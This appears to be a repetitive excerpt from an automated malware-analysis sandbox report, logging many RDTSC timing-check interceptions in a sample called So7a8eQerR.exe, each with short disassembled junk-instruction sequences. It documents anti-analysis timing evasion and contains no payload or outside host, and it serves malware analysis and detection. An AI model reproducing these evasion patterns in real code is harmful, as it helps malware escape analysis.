                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9B11E second address: B9B14F instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA5CCB7DEE1h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007FA5CCB7DED9h 0x0000000f push eax 0x00000010 push edx 0x00000011 jnc 00007FA5CCB7DEC6h 0x00000017 jng 00007FA5CCB7DEC6h 0x0000001d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9B14F second address: B9B153 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B9F08C second address: B9F091 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA1B90 second address: BA1B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA1B94 second address: BA1B98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA1B98 second address: BA1BED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jbe 00007FA5CCB52645h 0x00000011 je 00007FA5CCB52626h 0x00000017 jmp 00007FA5CCB52639h 0x0000001c jo 00007FA5CCB52645h 0x00000022 jne 00007FA5CCB52626h 0x00000028 jmp 00007FA5CCB52639h 0x0000002d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA1BED second address: BA1C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA5CCB7DEC6h 0x0000000a jmp 00007FA5CCB7DECEh 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA3F16 second address: BA3F1C instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA65CE second address: BA65D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA65D5 second address: BA65DC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BA65DC second address: BA65E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAC9E0 second address: BACA0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA5CCB52626h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f jmp 00007FA5CCB52634h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jns 00007FA5CCB52626h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BACA0F second address: BACA1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jo 00007FA5CCB7DEC6h 0x0000000c popad 0x0000000d rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAB292 second address: BAB2AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FA5CCB5262Dh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAB2AA second address: BAB2D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED0h 0x00000007 jmp 00007FA5CCB7DED7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAB58C second address: BAB593 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5BB27 second address: B5BB2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: B5BBEC second address: B5BBF2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BABCF5 second address: BABD0F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA5CCB7DED0h 0x0000000d push esi 0x0000000e pop esi 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BABD0F second address: BABD19 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA5CCB52626h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BABD19 second address: BABD61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB7DED9h 0x00000007 jmp 00007FA5CCB7DED1h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FA5CCB7DED2h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BABD61 second address: BABD71 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FA5CCB5262Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BABD71 second address: BABD76 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAF876 second address: BAF886 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB5262Ch 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAF886 second address: BAF8A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jp 00007FA5CCB7DED3h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAF8A6 second address: BAF8B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB5262Dh 0x00000009 popad 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFCA4 second address: BAFCB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DECDh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFCB5 second address: BAFCB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFCB9 second address: BAFCD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DECEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFCD3 second address: BAFCD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFCD7 second address: BAFCDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BAFF82 second address: BAFF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BB00E0 second address: BB00E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BB48A6 second address: BB48AA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BB48AA second address: BB48DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FA5CCB7DECBh 0x0000000d pushad 0x0000000e js 00007FA5CCB7DEC8h 0x00000014 pushad 0x00000015 popad 0x00000016 pushad 0x00000017 jnc 00007FA5CCB7DEC6h 0x0000001d jmp 00007FA5CCB7DECAh 0x00000022 popad 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BB48DB second address: BB48F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA5CCB52626h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 ja 00007FA5CCB52626h 0x00000019 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBA3E8 second address: BBA3EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBAA07 second address: BBAA0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBAA0F second address: BBAA15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBAD0D second address: BBAD15 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBAD15 second address: BBAD1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBB56C second address: BBB57D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jng 00007FA5CCB5262Ch 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBB57D second address: BBB58F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 popad 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBB58F second address: BBB5BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52636h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA5CCB52633h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBB5BE second address: BBB5C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBBA9D second address: BBBABB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push edx 0x00000006 jne 00007FA5CCB52632h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBBABB second address: BBBABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBC112 second address: BBC118 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBC118 second address: BBC11E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBC11E second address: BBC122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBC122 second address: BBC126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBC126 second address: BBC12C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF28F second address: BBF29E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jl 00007FA5CCB7DEC6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF29E second address: BBF2B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 pushad 0x00000007 ja 00007FA5CCB5262Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF2B5 second address: BBF2B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF538 second address: BBF53C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF53C second address: BBF55A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007FA5CCB7DED4h 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BBF55A second address: BBF55E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD5B8 second address: BCD5C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD6F7 second address: BCD724 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FA5CCB5262Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c jmp 00007FA5CCB52639h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD724 second address: BCD73A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jnc 00007FA5CCB7DEC6h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 pushad 0x00000012 popad 0x00000013 push edx 0x00000014 pop edx 0x00000015 popad 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD73A second address: BCD73F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD73F second address: BCD762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED6h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FA5CCB7DEC6h 0x00000012 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCD8BD second address: BCD8C1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCE1D8 second address: BCE1E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCE1E2 second address: BCE1E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCE1E8 second address: BCE20C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA5CCB7DEC6h 0x00000008 jmp 00007FA5CCB7DED6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCE20C second address: BCE210 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BCC88B second address: BCC892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE069E second address: BE06B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB5262Fh 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE06B1 second address: BE06BB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA5CCB7DEC6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE06BB second address: BE06CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FA5CCB5262Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE06CB second address: BE06D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE023B second address: BE023F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE023F second address: BE0245 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE0245 second address: BE0251 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE0251 second address: BE0257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE0257 second address: BE025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE376B second address: BE3771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE6188 second address: BE6192 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 push edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE6192 second address: BE61A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA5CCB7DED1h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BE5D09 second address: BE5D11 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BF3D5E second address: BF3D6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FA5CCB7DEC6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BF3D6A second address: BF3D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BF3D6F second address: BF3D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: BF3D75 second address: BF3D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA5CCB5262Dh 0x0000000e jnl 00007FA5CCB52626h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C01089 second address: C0108D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C0108D second address: C01091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C01091 second address: C010A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007FA5CCB7DECEh 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C011F2 second address: C01201 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnp 00007FA5CCB52626h 0x00000009 pop esi 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C01393 second address: C013C8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA5CCB7DEC6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA5CCB7DED3h 0x00000013 jmp 00007FA5CCB7DED4h 0x00000018 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C017BE second address: C017D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA5CCB52637h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C017D9 second address: C017EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA5CCB7DECCh 0x0000000b rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C01933 second address: C01954 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA5CCB5262Ah 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007FA5CCB5262Eh 0x00000014 rdtsc
                        Source: C:\Users\user\Desktop\So7a8eQerR.exeRDTSC instruction interceptor: First address: C01954 second address: C0196A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FA5CCB7DECBh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
